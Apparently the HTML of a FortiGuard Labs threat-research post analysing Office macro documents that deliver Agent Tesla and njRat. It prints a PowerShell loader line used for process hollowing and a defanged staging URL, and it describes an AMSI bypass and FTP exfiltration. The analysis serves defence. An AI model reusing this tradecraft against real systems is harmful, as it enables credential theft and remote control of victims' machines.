Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat

<!DOCTYPE HTML> <html lang="en" data-template="post-page"> <head> <link rel="preload" as="script" href="/etc/designs/fortinet/adb-target/visitorapi.min.js"/> <link rel="preload" as="script" href="/etc/designs/fortinet/adb-target/at.js"/> <script> ;(function(win, doc, style, timeout) { var STYLE_ID = 'at-body-style'; function getParent() { return doc.getElementsByTagName('head')[0]; } function addStyle(parent, id, def) { if (!parent) { return; } var style = doc.createElement('style'); style.id = id; style.innerHTML = def; parent.appendChild(style); } function removeStyle(parent, id) { if (!parent) { return; } var style = doc.getElementById(id); if (!style) { return; } parent.removeChild(style); } addStyle(getParent(), STYLE_ID, style); setTimeout(function() { removeStyle(getParent(), STYLE_ID); }, timeout); }(window, document, "body {opacity: 0 !important}", 3000)); </script> <script type="text/plain" class="optanon-category-C0003" src="/etc/designs/fortinet/adb-target/visitorapi.min.js"></script> <script type="text/plain" class="optanon-category-C0003" src="/etc/designs/fortinet/adb-target/at.js"></script> <meta charset="UTF-8"/> <title>Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat | FortiGuard Labs </title> <meta name="keywords" content="microsoft,rat,FortiGuard Labs,FortiGuard Labs Threat Research,Agent Tesla"/> <meta name="description" content="FortiGuard Labs discovered malicious Microsoft Office documents attempting to leverage legitimate websites to execute a shell script and drop malware variants of Agent Tesla and njRat. Read more for details."/> <meta name="template" content="post-page"/> <meta name="viewport" content="width=device-width, initial-scale=1"/> <meta name="google-site-verification" content="tiQ03tSujT2TSsWJ6tNHiiUn8cwYVmdMQrGUCNrPQmo"/> <meta property="og:site_name" content="Fortinet Blog"/> <meta property="og:title" content="Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat | FortiGuard Labs "/> <meta property="og:url" content="https://www.fortinet.com/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat"/> <meta property="og:type" content="article"/> <meta property="og:description" content="FortiGuard Labs discovered malicious Microsoft Office documents attempting to leverage legitimate websites to execute a shell script and drop malware variants of Agent Tesla and njRat. Read more fo…"/> <meta property="og:image" content="https://www.fortinet.com/content/dam/fortinet-blog/article-images/tesla-research-hero.jpg"/> <meta property="twitter:card" content="summary"/> <meta property="twitter:site" content="@Fortinet"/> <meta property="article:author" content="Cara Lin"/> <meta property="article:section" content="FortiGuard Labs Threat Research"/> <meta property="article:published_time" content="2022-10-03T21:50:00.000Z"/> <meta property="article:tag" content="microsoft"/> <meta property="article:tag" content="rat"/> <meta property="article:tag" content="FortiGuard Labs"/> <meta property="article:tag" content="Agent Tesla"/> <link rel="shortcut icon" href="/etc/designs/fortinet-blog/favicon.ico"/> <link rel="canonical" href="https://www.fortinet.com/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat"/> <link rel="stylesheet" href="/etc.clientlibs/fortinet-blog/clientlibs/clientlib-base.min.900b148ab7b87024003111a1245cca9c.css" type="text/css">   <script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" data-document-language="true" type="text/javascript" charset="UTF-8" data-domain-script="f85f39fc-d7aa-467a-b762-fbb722748016"></script> <script type="text/javascript"> function OptanonWrapper() { { try{ $('#cookiescript_injected').remove(); // remove old cookie script }catch(e){} window.dataLayer.push({ event: 'OneTrustGroupsUpdated' }); Optanon.InsertScript('//assets.adobedtm.com/launch-EN23cb8375449840dc93b13f34d935b8b9.min.js','head',null, null, '1',true); } } </script>    <meta name="be:sdk" content="java_sdk_1.6.7" /> <meta name="be:timer" content="66ms" /> <meta name="be:norm_url" content="https://www.fortinet.com/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat" /> <meta name="be:capsule_url" content="https://ixfd1-api.bc0a.com/api/ixf/1.0.0/get_capsule/f00000000310757/01219521314" /> <meta name="be:api_dt" content="pny_2024; pnm_11; pnd_22; pnh_01; pnmh_41; pn_epoch:1732268486584" /> <meta name="be:mod_dt" content="pny_1969; pnm_12; pnd_31; pnh_16; pnmh_00; pn_epoch:0" /> <meta name="be:orig_url" content="https://www.fortinet.com/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat" /> <meta name="be:messages" content="0" /><style> .be-ix-link-block {clear:both;background-color: #000;} .be-ix-link-block .be-related-link-container { padding: 15px;padding-top: 0;margin: 0 auto;max-width: 70em;width: 92vw;} .be-ix-link-block .be-related-link-container .be-label {margin: 0;color: #fff; font-size: 2rem; font-weight: 400;} .be-ix-link-block .be-related-link-container .be-list {display: inline-block;list-style: none;margin: 0;padding: 0;margin-top: 5px;} .be-ix-link-block .be-related-link-container .be-list .be-list-item {display: inline-block;margin-right: 20px;} .be-ix-link-block .be-related-link-container .be-list .be-list-item .be-related-link{color: #fff;} .be-ix-link-block .be-related-link-container .be-list .be-list-item .be-related-link:hover{opacity: .7;color: #fff;} .be-ix-link-block .be-related-link-container .be-list .be-list-item:last-child {margin-right: 0;} .page .be-ix-link-block {clear:both;background-color:#e6e6e6;} .page .be-ix-link-block .be-related-link-container {padding-bottom: 15px;text-align: center;} .page .be-ix-link-block .be-related-link-container .be-label {color: #000;font-size: 1.3rem;font-weight: 400;} .page .be-ix-link-block .be-related-link-container .be-list {margin-top:0;} .page .be-ix-link-block .be-related-link-container .be-list .be-list-item {margin-right: 4px;} .page .be-ix-link-block .be-related-link-container .be-list .be-list-item .be-related-link{color: #000;} .page .be-ix-link-block .be-related-link-container .be-list .be-list-item .be-related-link:hover{color: #000;} .page .be-ix-link-block .be-related-link-container .be-list .be-list-item:not(:last-child):after {content: " | ";color: #000;} @media (max-width: 767px) { .be-ix-link-block .be-related-link-container{padding-bottom: 15px;} .be-ix-link-block .be-related-link-container .be-label {width: 100%;} .be-ix-link-block .be-related-link-container .be-list {display: block;width: 100%;} .be-ix-link-block .be-related-link-container .be-list .be-list-item {display: block;margin-right: 0;}} @media (min-width: 768px) { .be-ix-link-block .be-related-link-container {display: flex;} .be-ix-link-block .be-related-link-container .be-label {display: inline-block;flex-basis: 150px;flex-grow: 0;flex-shrink: 0;margin-right: 20px;} .be-ix-link-block .be-related-link-container .be-list {width: auto;} .page .be-ix-link-block .be-related-link-container .be-label {display: inline-block;flex-basis: 150px;flex-grow: 0;flex-shrink: 0;margin-right: 20px;}} </style>  </head> <body> <div class="root responsivegrid"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> <div class="b1-header aem-GridColumn aem-GridColumn--default--12"> <header class="b1-header__container"> <div class="b1-header__logo"> <a href="https://www.fortinet.com"> <img class="desktop-logo" src="/content/dam/fortinet-blog/fortinet-logo-white.svg" alt="Fortinet home"/> <img class="mobile-logo" src="/content/dam/fortinet-blog/fortinet-logo-white.svg" alt="Fortinet home"/> </a> </div> <div class="b1-header__cta-list"> <a class="b1-header__cta-list-item " href="https://www.fortinet.com/blog"> <span>Blog</span> </a> </div> <div class="b1-header__nav"><div class="b2-navigation"> <ul class="b2-navigation__list"> <li class="b2-navigation-categories"><div class="b2-navigation__list-item nav-dropdown-title">Categories</div> <ul class="navdropdown"> <li> <a class="b2-navigation__dropdown__list-item" href="/blog/business-and-technology"> <span>Business & Technology </span> </a> </li> <li> <a class="b2-navigation__dropdown__list-item" href="/blog/threat-research"> <span>FortiGuard Labs Threat Research</span> </a> </li> <li> <a class="b2-navigation__dropdown__list-item" href="/blog/industry-trends"> <span>Industry Trends</span> </a> </li> <li> <a class="b2-navigation__dropdown__list-item" href="/blog/life-at-fortinet"> <span>Life at Fortinet</span> </a> </li> <li> <a class="b2-navigation__dropdown__list-item" href="/blog/partners"> <span>Partners</span> </a> </li> <li> <a class="b2-navigation__dropdown__list-item" href="/blog/customer-stories"> <span>Customer Stories</span> </a> </li> <li> <a class="b2-navigation__dropdown__list-item" href="/blog/psirt-blogs"> <span>PSIRT Blogs</span> </a> </li> </ul> </li> <li class="m-nav-item"> <a class="b2-navigation__list-item false" href="/blog/business-and-technology"> <span>Business & Technology </span> </a> </li> <li class="m-nav-item"> <a class="b2-navigation__list-item false" href="/blog/threat-research"> <span>FortiGuard Labs Threat Research</span> </a> </li> <li class="m-nav-item"> <a class="b2-navigation__list-item false" href="/blog/industry-trends"> <span>Industry Trends</span> </a> </li> <li class="m-nav-item"> <a class="b2-navigation__list-item false" href="/blog/life-at-fortinet"> <span>Life at Fortinet</span> </a> </li> <li class="m-nav-item"> <a class="b2-navigation__list-item false" href="/blog/partners"> <span>Partners</span> </a> </li> <li class="m-nav-item"> <a class="b2-navigation__list-item false" href="/blog/customer-stories"> <span>Customer Stories</span> </a> </li> <li class="m-nav-item"> <a class="b2-navigation__list-item false" href="/blog/psirt-blogs"> <span>PSIRT Blogs</span> </a> </li> <li> <a class="b2-navigation__list-item false" href="/blog/ciso-collective"> <span>CISO Collective</span> </a> </li> </ul> </div> </div> <div id="blog-site-search" class="b1-header__search" aria-expanded="false"><div class="b3-searchbox"> <form class="b3-searchbox__form" action="/blog/search" method="get"> <input class="b3-searchbox__input" type="text" name="q" placeholder="Search Blogs"/> <button class="b3-searchbox__icon" aria-label="Search" type="submit"> <svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"> <path d="M15.688 14.18l-4.075-4.075C12.36 9.06 12.8 7.78 12.8 6.4 12.8 2.87 9.93 0 6.4 0 2.87 0 0 2.87 0 6.4c0 3.53 2.87 6.4 6.4 6.4 1.38 0 2.66-.44 3.705-1.187l4.075 4.075c.207.208.48.312.753.312.274 0 .547-.104.755-.312.416-.417.416-1.093 0-1.51zM2.133 6.4c0-2.357 1.91-4.267 4.267-4.267s4.267 1.91 4.267 4.267-1.91 4.267-4.267 4.267S2.133 8.757 2.133 6.4z" fill="#fff"> </path> </svg> </button> </form> </div> </div> <button class="b1-header__search-toggle" aria-controls="blog-site-search" aria-label="Search"> <svg viewBox="0 0 16 16" xmlns="http://www.w3.org/2000/svg"> <path d="M15.688 14.18l-4.075-4.075C12.36 9.06 12.8 7.78 12.8 6.4 12.8 2.87 9.93 0 6.4 0 2.87 0 0 2.87 0 6.4c0 3.53 2.87 6.4 6.4 6.4 1.38 0 2.66-.44 3.705-1.187l4.075 4.075c.207.208.48.312.753.312.274 0 .547-.104.755-.312.416-.417.416-1.093 0-1.51zM2.133 6.4c0-2.357 1.91-4.267 4.267-4.267s4.267 1.91 4.267 4.267-1.91 4.267-4.267 4.267S2.133 8.757 2.133 6.4z"> </path> </svg> <div class="b1-header__search-toggle-close"> <span class="b1-header__search-toggle-close-line"></span> <span class="b1-header__search-toggle-close-line"></span> </div> </button> <div class="b1-header__nav-toggle" aria-hidden="true"> <span class="b1-header__nav-toggle-line"></span> <span class="b1-header__nav-toggle-line"></span> <span class="b1-header__nav-toggle-line"></span> </div> </header> </div> <section class="b4-hero aem-GridColumn aem-GridColumn--default--12"> <div class="b4-hero__container" style="background-image:url(/content/dam/fortinet-blog/article-images/tesla-research-hero.jpg);"> <img class="ratio" alt="Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat | FortiGuard Labs " aria-hidden="true" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAQAAAADCAQAAAAe/WZNAAAADklEQVR42mNkgAJGDAYAAFEABCaLYqoAAAAASUVORK5CYII="/> <div class="b4-hero__text text-container"> <p data-ly-test class="b4-hero__kicker">FortiGuard Labs Threat Research</p> <h1 class="b4-hero__headline">Leveraging Microsoft Office Documents to Deliver Agent Tesla and njRat </h1> </div> </div> </section> <section class="b15-blog-meta aem-GridColumn aem-GridColumn--default--12"> <div class="b15-blog-meta__container text-container"> <span>By </span> <span class="b15-blog-meta__author"> <a href="/blog/search?author=Cara+Lin">Cara Lin</a> </span> <span class="b15-blog-meta__"> </span> <span class="b15-blog-meta__date"> | October 03, 2022</span> </div> </section> <div class="responsivegrid aem-GridColumn aem-GridColumn--default--12"> <div class="aem-Grid aem-Grid--12 aem-Grid--default--12 "> <div class="raw-import aem-GridColumn aem-GridColumn--default--12"> <div class="text-container"></div> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>We recently found some malicious Microsoft Office documents that attempted to leverage legitimate websites—MediaFire and Blogger—to execute a shell script and then dropped two malware variants of Agent Tesla and njRat. Agent Tesla is a well-known spyware, first discovered in 2014, which can steal personal data from web browsers, mail clients, and FTP servers, collect screenshots and videos, and capture clipboard data. njRat (also known as Bladabindi) is a remote agent Trojan first discovered in 2013 that is capable of remotely controlling a victim’s device to log keystrokes, access the camera, steal credentials stored in browsers, upload/download files, manipulate the registry, and more.</p> <p style="margin-left: 40.0px;"><b>Affected platforms: </b>Microsoft Windows<br /> <b>Impacted parties: </b>Windows users<br /> <b>Impact: </b>Control and collect sensitive information from a victim’s device<br /> <b>Severity level:</b> Critical<br /> </p> <p>In this article we will provide details of the documents we discovered, their embedded scripts used to deliver a payload, and the behavior of these malware variants.</p> <h2>1<sup>st</sup> Stage</h2> <p>In September 2022 we collected two kinds of files. One is a PowerPoint Add-in and another is a Word document that contained a lure picture and an embedded Excel form. Both files included similar VBA scripts that execute a macro right after opening the document.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_424651011.img.png/1664852999563/screen-shot-2022-10-03-at-20.06.14.png" alt="Images of two kinds of files, one is a PowerPoint Add-in and another is a Word document containing a lure picture and an embedded Excel form. " class="custom"/> </noscript>  </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Based on the VBA script in the PPT add-in, shown in Figure 1, the code is automatically triggered because it uses the “Auto_Open()” function. Its “ControlTipText” and “Tag” fields contain the complete command “mshta” and the MediaFire URL. We can see the full URL in “vbaProject.bin”.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_982425706.img.png/1664579697015/fig1.png" alt="Figure 1: The VBA macro from the PPT add-In" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 1: The VBA macro from the PPT add-In</span> </div> <div class="cmp cmp-image aem-GridColumn aem-GridColumn--default--12"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1881471673.img.png/1664579715972/fig2.png" alt="Figure 2: Complete malicious URL in the vbaProject.bin file" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 2: Complete malicious URL in the vbaProject.bin file</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>2<sup>nd</sup> Stage</h2> <p>We can see from Process Explorer shown in Figure 3 that the “mshta” process started right after clicking “Enable Macros” in the document. This leads to the MediaFire website, which is a legitimate file and picture sharing platform.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_46910527.img.png/1664579739834/fig3.png" alt="Figure 3: Process Explorer after clicking “Enable Macros”" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 3: Process Explorer after clicking “Enable Macros”</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Below is the content of “1.htm” from the first stage VBA macro:</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_2063549090.img.png/1664579763402/fig4.png" alt="Figure 4: “1.htm” downloaded from MediaFire" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 4: “1.htm” downloaded from MediaFire</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Figure 5 shows a clearer picture after converting some hex to ascii string.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1844464533.img.png/1664579781856/fig5.png" alt="Figure 5: Converted "1.htm"" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 5: Converted "1.htm"</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <div>This HTML file has three main jobs:</div> <ol> <li>Deliver a third-stage script file from the MediaFire site</li> <li>Kill the task WINWORD.EXE</li> <li>Add persistence by creating a scheduled task. It uses “mshta” to connect to the “http[:]//www.webclientservices.co[.]uk/p/1[.]html” site, which contains a similar script every 73 minutes. The blog screenshot seen below is from September 2022:</li> </ol> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1684193002.img.png/1664579877318/fig6.png" alt="Figure 6: Web page of www[.]webclientservices[.]co[.]uk/p/1[.]html in the middle of September" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 6: Web page of www[.]webclientservices[.]co[.]uk/p/1[.]html in the middle of September</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>We also discovered that the 1.html file in “www[.]webclientservices[.]co[.]uk” had been updated and renamed as “real all BACK SEP 2022”. The embedded JavaScript was also changed and now delivers other malware. More details are in the following section.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_366289932.img.png/1664579908623/fig7.png" alt="Figure 7: Updated page of www[.]webclientservices[.]co[.]uk/p/1[.]html found at the end of September " class="custom"/> </noscript>  <span class="cmp-image--title">Figure 7: Updated page of www[.]webclientservices[.]co[.]uk/p/1[.]html found at the end of September </span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>3<sup>rd</sup> Stage</h2> <p>The PowerShell script in “1.txt”, downloaded from MediaFire, delivers its final payload via the process hollowing technique. It first kills all related processes and decodes the loader and payload. It then invokes the final payload and deploys it, bypassing AMSI. The main malware and part of the code are encoded and replaced with strings to increase the difficulty of analysis.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_624902005.img.png/1664579951661/fig8.png" alt="Figure 8: Full picture of the PowerShell used to load Agent Tesla" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 8: Full picture of the PowerShell used to load Agent Tesla</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1709765622.img.png/1664579976117/fig9.png" alt="Figure 9: Process Explorer after PowerShell is executed" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 9: Process Explorer after PowerShell is executed</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>In the second part of the “Load Agent Tesla Payload” process, the variables $CLE11 and $RNBX1 are the final payload and the loader after replacing some strings. Based on different version of .NET, it customizes paths for proceeding with the process hollowing activity:</p> <p style="margin-left: 40.0px;"><i>$Path = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe'</i></p> <p style="margin-left: 40.0px;"><i>$Path2 = 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe'</i></p> <p style="margin-left: 40.0px;"><i>$Path3 = 'C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe</i></p> <p><i> [Ref]/Assembly::Load((HexaToByte($RNBX1))).GetType('CALC'.PAYSIAS'.'GetMethod'(Execute).Invoke($null,[object[]] ($Path, HexaToByte($CLE11)));</i></p> <p>We saved $RNBX1 as an executable file and opened it with dnSpy. The target class and method can be seen in Figure 10. This .Net loader leverages some obfuscation to hide the main APIs (CreateProcess, VirtualAllocEx…, etc.)</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1262630417.img.png/1664580062842/fig-10.1.png" alt="10.1" class="custom"/> </noscript>  </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1278752504.img.png/1664580079364/fig10.2.png" alt="Figure 10: .Net Loader" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 10: .Net Loader</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>We located the targeted processes, “jsc.ex”, “caspol.exe” and “Msbuild.exe”, running quietly in the victim’s machine. The details are shown in Figure 11.</p> </div> <div class="cmp cmp-image aem-GridColumn aem-GridColumn--default--12"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_446872097.img.png/1664580105454/fig11.png" alt="Figure 11: Process Explorer while process hollowing" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 11: Process Explorer while process hollowing</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>In the end of the PowerShell section, it disables logging and bypasses AMSI by patching it. Detail steps can be seen in Figure 12.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_2063263357.img.png/1664580135865/fig12.png" alt="Figure 12: Bypassing AMSI in PowerShell" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 12: Bypassing AMSI in PowerShell</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>Final Stage – Part 1</h2> <p>The first malware payload is Agent Tesla. This variant began spreading in the middle of September. It includes legitimate file information, "Web Browser Password Viewer" from the company “NirSoft”, and uses FTP to send out stolen data.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_844228499.img.png/1664580164742/fig13.png" alt="Figure 13: Basic information of Agent Tesla" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 13: Basic information of Agent Tesla</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Figure 14 is a screenshot of the attacker’s FTP server information, including username and password, used for transferring extracted data. This variant also copies itself into the %appdata% directory with the filename “NGCwje.exe” for persistence.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_2023173397.img.png/1664580245098/fig14.png" alt="Figure 14: The attacker’s server information" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 14: The attacker’s server information</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>It then starts to extract the victim device’s information, such as serial number of the base board, processor ID, and MAC address. It then generates an MD5 hash for this data.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_499330881.img.png/1664580269352/fig15.png" alt="Figure 15: Generating an Md5 hash for the victim machine’s information" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 15: Generating an Md5 hash for the victim machine’s information</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Agent Tesla uses a typical application list to steal login credentials, cookies, mail information, and VPN data. A partial set of these items can be seen in the following figure:</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_562142613.img.png/1664580299097/fig16.png" alt="Figure 16: List for targeted browser applications" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 16: List for targeted browser applications</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Once the malware retrieves the credentials and other information from the victim’s machine, it sends this data via FTP protocol using hardcoded IP. </p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_451865649.img.png/1664580354451/fig17.png" alt="Figure 17: Utilizing the FTP protocol" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 17: Utilizing the FTP protocol</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_1477775240.img.png/1664580391252/fig18.png" alt="Figure 18: Traffic capture from the victim's machine" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 18: Traffic capture from the victim's machine</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <p>Based on the different types of files it encounters, it utilizes four kinds of opening strings: “CO” is for cookie data, “KL” is for keyboard logging, “PW” is for the victim’s password information, and “SC” is for screenshot files. The malware uses underlines to connect the type of data, username, device name, and timestamp together for the filename for the data ZIP file. The list of stolen zip files is shown as below:</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--8 aem-GridColumn--offset--default--2"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image_2050038414.img.png/1664580418899/fig19.png" alt="Figure 19: Partial list of the Zip files on the FTP server" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 19: Partial list of the Zip files on the FTP server</span> </div> <div class="cmp cmp-text aem-GridColumn aem-GridColumn--default--12"> <h2>Final Stage – Part 2</h2> <p>The second payload is njRat, also known as Bladabindi. It is a .NET Trojan for controlling and spying on a victim’s device. This variant uses obfuscation for its string generation and code flow. From an IDA graph overview of method ko(), you can see that this variant is more complex, but you can still identify the similar functions.</p> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--6 aem-GridColumn--offset--default--3"> <noscript data-cmp-image="{"smartImages":[],"smartSizes":[],"lazyEnabled":true}"> <img src="/blog/threat-research/leveraging-microsoft-office-documents-to-deliver-agent-tesla-and-njrat/_jcr_content/root/responsivegrid/image.img.png/1664581789420/fig2222222.png" alt="Figure 20: IDA graph overview" class="custom"/> </noscript>  <span class="cmp-image--title">Figure 20: IDA graph overview</span> </div> <div class="cmp cmp-image aem-GridColumn--default--none aem-GridColumn aem-GridColumn--default--10 aem-GridColumn--offset--default--1"> <noscript 